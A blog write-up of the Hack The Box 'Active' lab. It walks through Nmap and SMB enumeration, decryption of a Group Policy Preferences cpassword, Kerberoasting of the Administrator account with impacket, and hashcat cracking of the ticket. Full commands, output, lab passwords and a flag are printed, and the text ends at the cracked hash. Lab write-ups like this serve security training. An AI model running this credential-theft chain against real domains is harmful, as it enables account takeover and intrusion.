Post

HackTheBox - Active WriteUp

This post documents my walkthrough of the Active machine from Hack The Box. It involves Active Directory enumeration, SMB share analysis, Group Policy Preference exploitation, and Kerberoasting to ultimately gain administrator access.

HackTheBox - Active WriteUp

Enumeration

Port Scanning

As always, the first step is to perform an Nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
┌──(krakenn㉿Phoenix)-[~/CPTS/Boxes/Active/Nmap]                
└─$ sudo nmap -Pn -n -sV -sC -A -T4 10.10.10.100 -oA Default-Nmap                                                                                                                                                                          
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 00:37 +01    
Nmap scan report for 10.10.10.100
Host is up (0.052s latency).
Not shown: 982 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-15 23:38:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=7/16%OT=53%CT=1%CU=41127%PV=Y%DS=2%DC=T%G=Y%TM=6876E6A
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=
OS:7)SEQ(SP=103%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=7)SEQ(SP=104%GCD=1%ISR
OS:=10B%TI=I%CI=I%II=I%SS=S%TS=7)SEQ(SP=106%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS
OS:=S%TS=7)SEQ(SP=F9%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=7)OPS(O1=M552NW8S
OS:T11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552
OS:ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=
OS:80%W=2000%O=M552NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2
OS:(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q
OS:=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G
OS:)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-15T23:39:11
|_  start_date: 2025-07-15T23:08:37

TRACEROUTE (using port 23/tcp)
HOP RTT      ADDRESS
1   51.43 ms 10.10.14.1
2   51.56 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.11 seconds

Valuable Information:

Port NumberServiceVersion
53/TCPDNSMicrosoft DNS 6.1.7601
88/TCPKerberosMicrosoft Windows Kerberos
139/TCP 445/TCPSMBX
3268/TCPLDAPMicrosoft Windows Active Directory LDAP
  • Operating System: Windows Server 2008 R2 Service Pack 1

  • Since DNS, Kerberos, and LDAP are in use, we can conclude that the environment is based on Active Directory.

  • Domain: active.htb

Footprinting SMB

Attempting to enumerate SMB shares via anonymous access.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
┌──(krakenn㉿Phoenix)-[~]
└─$ smbmap -H 10.10.10.100 -r Replication --depth 100 
[+] IP: 10.10.10.100:445        Name: 10.10.10.100              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share                                                                                                                                         
        Replication                                             READ ONLY
        ./Replication               
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .                     
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    active.htb
        ./Replication//active.htb
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .         
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    DfsrPrivate
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    Policies
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    scripts
        ./Replication//active.htb/DfsrPrivate
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ConflictAndDeleted
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    Deleted
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    Installing
        ./Replication//active.htb/Policies
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    {31B2F340-016D-11D2-945F-00C04FB984F9}
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    {6AC1786C-016F-11D2-945F-00C04fB984F9}
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        fr--r--r--               23 Sat Jul 21 11:38:11 2018    GPT.INI
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    Group Policy
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    MACHINE
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    USER
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        fr--r--r--              119 Sat Jul 21 11:38:11 2018    GPE.INI
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    Microsoft
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    Preferences
        fr--r--r--             2788 Sat Jul 21 11:38:11 2018    Registry.pol
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    Windows NT
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    SecEdit
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        fr--r--r--             1098 Sat Jul 21 11:38:11 2018    GptTmpl.inf
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    Groups
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        fr--r--r--              533 Sat Jul 21 11:38:11 2018    Groups.xml
        ./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        fr--r--r--               22 Sat Jul 21 11:38:11 2018    GPT.INI
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    MACHINE
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    USER
        ./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    Microsoft
        ./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    Windows NT
        ./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    SecEdit
        ./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 11:37:44 2018    ..
        fr--r--r--             3722 Sat Jul 21 11:38:11 2018    GptTmpl.inf

Groups.xml

  • During the enumeration of the SMB share, we identified the presence of a file named Groups.xml, which contains the username and cpasssword of a user.
1
2
3
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
  • Username: active.htb\SVC_TGS
  • cpassword: edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

It can be decrypted using gpp-decrypt:

1
2
3
┌──(krakenn㉿Phoenix)-[~/CPTS/Boxes/Active]
└─$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
  • Password: GPPstillStandingStrong2k18

We can now use these credentials to enumerate the SMB shares again.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(krakenn㉿Phoenix)-[~]                                                      
└─$ smbmap -H 10.10.10.100 -u 'svc_tgs' -p 'GPPstillStandingStrong2k18'                                          
    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------        
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap
                        
[*] Detected 1 hosts serving SMB                                                     
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
               
[+] IP: 10.10.10.100:445        Name: 10.10.10.100              Status: Authenticated          
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share                                                                                                                                         
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share                                                                                                                                         
        Users                                                   READ ONLY
[*] Closed 1 connections                                   

Proceeding to enumerate the contents of the Users share:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
┌──(krakenn㉿Phoenix)-[~]                                                                                                                                                                                                                  
└─$ smbmap -H 10.10.10.100 -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' -r Users --depth 100
    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------        
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap
               
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
                                                                                  
[+] IP: 10.10.10.100:445        Name: 10.10.10.100              Status: Authenticated          
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share                                                                                                                                         
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share                                                                                                                                         
        Users                                                   READ ONLY
       
        ./Users               
        dw--w--w--                0 Sat Jul 21 15:39:20 2018    .
        dw--w--w--                0 Sat Jul 21 15:39:20 2018    ..
        dr--r--r--                0 Mon Jul 16 11:14:21 2018    Administrator
        dr--r--r--                0 Mon Jul 16 22:08:56 2018    All Users
        dw--w--w--                0 Mon Jul 16 22:08:47 2018    Default
        dr--r--r--                0 Mon Jul 16 22:08:56 2018    Default User
        fr--r--r--              174 Mon Jul 16 22:01:17 2018    desktop.ini
        dw--w--w--                0 Mon Jul 16 22:08:47 2018    Public
        dr--r--r--                0 Sat Jul 21 16:16:32 2018    SVC_TGS
        ./Users//Default
        dw--w--w--                0 Mon Jul 16 22:08:47 2018    .
        dw--w--w--                0 Mon Jul 16 22:08:47 2018    ..
        dr--r--r--                0 Mon Jul 16 22:08:47 2018    AppData
        dr--r--r--                0 Mon Jul 16 22:08:56 2018    Application Data
        dr--r--r--                0 Mon Jul 16 22:08:56 2018    Cookies

        ....
        ....
        ....

        ./Users//SVC_TGS/Desktop
        dr--r--r--                0 Sat Jul 21 16:14:42 2018    .
        dr--r--r--                0 Sat Jul 21 16:14:42 2018    ..
        fw--w--w--               34 Wed Jul 16 13:52:15 2025    user.txt
[*] Closed 1 connections                                                

Let’s download the user.txt file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(krakenn㉿Phoenix)-[~/CPTS/Boxes/Active]
└─$ smbmap -H 10.10.10.100 -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' -s Users --download './Users//SVC_TGS/Desktop/user.txt'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
[+] Starting download: Users\SVC_TGS\Desktop\user.txt (34 bytes)                                                         
[+] File output to: /home/krakenn/CPTS/Boxes/Active/10.10.10.100-Users_SVC_TGS_Desktop_user.txt                          
[*] Closed 1 connections                                                                                                     
                                                                                                                                                                                                                                           
┌──(krakenn㉿Phoenix)-[~/CPTS/Boxes/Active]
└─$ ls
 10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml               10.10.10.100-Users_SVC_TGS_Desktop_user.txt   Creds
'10.10.10.100-Replication_active.htb_Policies_{6AC1786C-016F-11D2-945F-00C04fB984F9}_MACHINE_Microsoft_Windows NT_SecEdit_GptTmpl.inf'   Administrator-TGS                             Nmap

┌──(krakenn㉿Phoenix)-[~/CPTS/Boxes/Active]
└─$ cat 10.10.10.100-Users_SVC_TGS_Desktop_user.txt 
1552882c279a0217d52873b6ef16a941

  • User Flag: 1552882c279a0217d52873b6ef16a941

PsExec

Now, let’s attempt to access the machine using PsExec with the credentials we found. Note that this will only work if the user has administrative privileges on the target system.

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(krakenn㉿Phoenix)-[~]
└─$ impacket-psexec active.htb/svc_tgs@10.10.10.100
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Requesting shares on 10.10.10.100.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Replication' is not writable.
[-] share 'SYSVOL' is not writable.
[-] share 'Users' is not writable.

  • As expected, the svc_tgs user does not have administrative privileges on the target machine, so we need to find an alternative approach.

Post Exploitation Enumeration

  • As we know, any authenticated user in an Active Directory environment can query information about the domain. We can leverage this by using tools like BloodHound to enumerate domain relationships and identify potential attack paths to the Domain Controller. However, since I’m feeling a bit lazy right now, I’ll skip BloodHound on this box and instead focus on finding Kerberoastable accounts using GetUserSPNs.
1
2
3
4
5
6
7
┌──(krakenn㉿Phoenix)-[~]
└─$ impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS                            
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40.351723  2025-07-16 13:52:18.056178             
  • We discovered that the user Administrator is vulnerable to Kerberoasting.

Privilege Escalation → Kerberoasting

1
2
3
4
5
6
7
8
9
10
11
┌──(krakenn㉿Phoenix)-[~]
└─$ impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS -request-user administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40.351723  2025-07-16 13:52:18.056178             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$49b5363310b16e0244c7a0ea1c8f4b94$b29d274341535580c945ff1d42b91d1eb6eb1fbe8c4ac36f78b934df3b33e0b7a68dbc0f065acf80afa88bdff51ce7b308bced84b9142d23be284e9e4e9bf272a8f2cf6a28123ca829884ad8a2e2573c5d68eb8f97bd08362ab527f4843d0fc9561db0c7dfea0342b927b004c0a4e83403bd2a0ffbe364102c7cec0a79b88fab0da0022809b741272b74ace99fe7b0487bfe04e256a9510ec6af96772533c9bdfa2b36dc0a6a13d4a9b6078811e8fb151335363eadcd25437b684c4d72e8e010dd82f22f45cc83211b3cdc72a5643924a70a22b9fa7a3dc64386f638a0005b02a73ff44a981c785ccf2b2f6cfb8c7bd42f6ea23a75855e11d47da3659b83ee15ff28b02cedb772464bea72b201d8ff921e0127e9b89e0a780ef8b0a60ef5361e66e7c116dccf7ae4a072ded4dd6fb24f9e6b0bbbf43e79233f36fd26eeb471473eac476c8a23c4f9e3faf32fd60f771cd50c1d00e196c2a288687ddcd7e98179ffa263b81a343afcb1bb2bdf37b4c2b3aecf02a724d3e40f6593cbc524a83733d10624bf2e19b92df9b929a6dc92b542829f42844ff69f1c09fc0b2f09d36dba15417322f00c48aff27b58b620752e51499fb556dedcbe6f08178ea2ae191e719a285cd41442c02fab1daf607a8d3bf57c63e3ada4331d6e3d2709f10882e88757c9d1bd7ac4a306afc91cb2d4fbe27ad7a16e6e71b73c718f3061ffa6f4853d81ef8b38258b132bad128d06c8794feb28a946f811db1b9290a7d6761578c0dd9a85eb4b81160bfb405863f55c3c1361e73acf15c7305f28ec0a2f984fbb1fdbd11bd5072afc05cd9dd38bdd1d95527cf5e68d2f043710d9e31b84379402986f8fbfd98a048443d61f0d420c329ec6992c47e09db199eab50e04a8748412d4497d3656250a1f2f04396ee372fd8910c3cd9b64e8772849cd15b4e9515d99efef01421bf4f6baca27ec0592ef471f725e181ecb39cd7fb19ba4e580c3cd1cdf7a7628e84492b2a455614a51994c408d4b72915b2fd0ac49e671222d67999e9502aa1e00197ad8a6135827c099f26d357038c05f01d08648aa577319e73e52f6f8dd47ef8d06909eb432dc7003f22ce8fd6fe8dc892af714e04c135d8d82a47bb29172767f505df8915b4466c9ebbbda355698f8b50485d9384e57d97365b3f55852090cb1cfdf64f9bd8376d5deaae57c82b8df1f78d8d1cde720cac7af171f736207067f9a037d9c34aa4161cd471ec9357080a05ffc9d3f1178

We’ve successfully retrieved the Ticket Granting Service (TGS) ticket for the Administrator account. We can save this hash to a file and attempt to crack it using Hashcat.

Hash Cracking

To determine the appropriate Hashcat module, we can search online for ‘Hashcat hash modes’ and look for the one that matches hashes starting with $krb5tgs$23$. This corresponds to module 13100

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
┌──(krakenn㉿Phoenix)-[~/CPTS/Boxes/Active]                      
└─$ hashcat --help | grep "TGS"             
  19600 | Kerberos 5, etype 17, TGS-REP                              | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP                              | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol

┌──(krakenn㉿Phoenix)-[~/CPTS/Boxes/Active]                                              
└─$ hashcat -m 13100 Administrator-TGS /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
                                                                                                                                                                                                                                           
OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                                                                       
====================================================================================================================================================                                                         
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-8750H CPU @ 2.20GHz, 6862/13788 MB (2048 MB allocatable), 12MCU                                                                                       
Minimum password length supported by kernel: 0                                
Maximum password length supported by kernel: 256
                                  
Hashes: 1 digests; 1 unique digests, 1 unique salts                                    
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
                                                                                                                                                                                                                                           
Optimizers applied:                                                               
* Zero-Byte                                                             
* Not-Iterated                                                                     
* Single-Hash                                                                  
* Single-Salt                                                                   
                                                                                                                                                                                                                                           
ATTENTION! Pure (unoptimized) backend kernels selected.                       
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 3 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$49b5363310b16e0244c7a0ea1c8f4b94$b29d274341535580c945ff1d42b91d1eb6eb1fbe8c4ac36f78b934df3b33e0b7a68dbc0f065acf80afa88bdff51ce7b308bced84b9142d23be284e9e4e9bf272a8f2cf6a28123ca829884ad8a2e2573c5d68eb8f97bd08362ab527f4843d0fc9561db0c7dfea0342b927b004c0a4e83403bd2a0ffbe364102c7cec0a79b88fab0da0022809b741272b74ace99fe7b0487bfe04e256a9510ec6af96772533c9bdfa2b36dc0a6a13d4a9b6078811e8fb151335363eadcd25437b684
c4d72e8e010dd82f22f45cc83211b3cdc72a5643924a70a22b9fa7a3dc64386f638a0005b02a73ff44a981c785ccf2b2f6cfb8c7bd42f6ea23a75855e11d47da3659b83ee15ff28b02cedb772464bea72b201d8ff921e0127e9b89e0a780ef8b0a60ef5361e66e7c116dccf7ae4a072ded4dd6fb24f
9e6b0bbbf43e79233f36fd26eeb471473eac476c8a23c4f9e3faf32fd60f771cd50c1d00e196c2a288687ddcd7e98179ffa263b81a343afcb1bb2bdf37b4c2b3aecf02a724d3e40f6593cbc524a83733d10624bf2e19b92df9b929a6dc92b542829f42844ff69f1c09fc0b2f09d36dba15417322f00
c48aff27b58b620752e51499fb556dedcbe6f08178ea2ae191e719a285cd41442c02fab1daf607a8d3bf57c63e3ada4331d6e3d2709f10882e88757c9d1bd7ac4a306afc91cb2d4fbe27ad7a16e6e71b73c718f3061ffa6f4853d81ef8b38258b132bad128d06c8794feb28a946f811db1b9290a7d6
761578c0dd9a85eb4b81160bfb405863f55c3c1361e73acf15c7305f28ec0a2f984fbb1fdbd11bd5072afc05cd9dd38bdd1d95527cf5e68d2f043710d9e31b84379402986f8fbfd98a048443d61f0d420c329ec6992c47e09db199eab50e04a8748412d4497d3656250a1f2f04396ee372fd8910c3c
d9b64e8772849cd15b4e9515d99efef01421bf4f6baca27ec0592ef471f725e181ecb39cd7fb19ba4e580c3cd1cdf7a7628e84492b2a455614a51994c408d4b72915b2fd0ac49e671222d67999e9502aa1e00197ad8a6135827c099f26d357038c05f01d08648aa577319e73e52f6f8dd47ef8d0690
9eb432dc7003f22ce8fd6fe8dc892af714e04c135d8d82a47bb29172767f505df8915b4466c9ebbbda355698f8b50485d9384e57d97365b3f55852090cb1cfdf64f9bd8376d5deaae57c82b8df1f78d8d1cde720cac7af171f736207067f9a037d9c34aa4161cd471ec9357080a05ffc9d3f1178:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...3f1178
Time.Started.....: Wed Jul 16 18:33:56 2025 (4 secs)
Time.Estimated...: Wed Jul 16 18:34:00 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) 
Guess.Queue......: 1/1 (100.00%)
